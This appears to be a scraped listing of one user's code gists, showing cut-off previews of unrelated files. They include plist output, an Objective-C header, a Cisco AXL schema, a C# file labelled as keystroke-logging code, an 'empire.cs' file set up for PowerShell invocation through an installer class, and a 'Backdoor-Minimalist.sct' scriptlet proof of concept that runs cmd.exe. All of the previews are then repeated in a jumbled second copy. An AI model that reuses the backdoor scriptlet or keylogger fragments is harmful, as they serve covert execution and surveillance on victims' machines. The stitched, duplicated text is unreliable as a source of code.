Michael Evanchik MichaelEvanchik

## output on screen
(
        {
        "field_name" = name;
        value = Shadow;
    },
        {
        "field_name" = id;
        value = "-2";
    },
        {

## none just PoC
(
        {
        fields =         (
                        {
                “field_name” = “location_name”;
                value = Phantom;
                xpath = “./relatedLocations/relatedLocation/locationName”;
            },
                        {
                “field_name” = “location_name”;

## xpath
#include "NSUFRange.h"
#import <Foundation/NSValue.h>
#import <Foundation/NSObjCRuntime.h>

@class NSString;

typedef struct _NSUFRange {
	float location;
	float length;
}

## listPhoneResponse.xsd
<?xml version="1.0" encoding="UTF-8"?>
<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:axlapi="http://www.cisco.com/AXL/API/10.5" attributeFormDefault="unqualified" elementFormDefault="unqualified" targetNamespace="http://www.cisco.com/AXL/API/10.5" version="10.5">
    <xsd:simpleType name="XInteger">
        <xsd:union memberTypes="xsd:integer">
            <xsd:simpleType>
                <xsd:restriction base="xsd:string">
                    <xsd:enumeration value=""></xsd:enumeration>
                </xsd:restriction>
            </xsd:simpleType>
        </xsd:union>

## iukl.cs
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
 * https://code.google.com/p/klog-sharp/
*/

## empire.cs
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

## Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
	(
	{
	"field_name" = name;
	value = Shadow;
	},
	{
	"field_name" = id;
	value = "-2";
	},
	{
	(
	{
	fields = (
	{
	“field_name” = “location_name”;
	value = Phantom;
	xpath = “./relatedLocations/relatedLocation/locationName”;
	},
	{
	“field_name” = “location_name”;
	#include "NSUFRange.h"
	#import <Foundation/NSValue.h>
	#import <Foundation/NSObjCRuntime.h>

	@class NSString;

	typedef struct _NSUFRange {
	float location;
	float length;
	}
	<?xml version="1.0" encoding="UTF-8"?>
	<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:axlapi="http://www.cisco.com/AXL/API/10.5" attributeFormDefault="unqualified" elementFormDefault="unqualified" targetNamespace="http://www.cisco.com/AXL/API/10.5" version="10.5">
	<xsd:simpleType name="XInteger">
	<xsd:union memberTypes="xsd:integer">
	<xsd:simpleType>
	<xsd:restriction base="xsd:string">
	<xsd:enumeration value=""></xsd:enumeration>
	</xsd:restriction>
	</xsd:simpleType>
	</xsd:union>
	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Windows.Forms;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;
	//KeyStroke Mouse Clicks Code
	/*
	* https://code.google.com/p/klog-sharp/
	*/
	using System;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	//Add For PowerShell Invocation
	using System.Collections.ObjectModel;
	using System.Management.Automation;
	using System.Management.Automation.Runspaces;
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="Empire"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
	<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");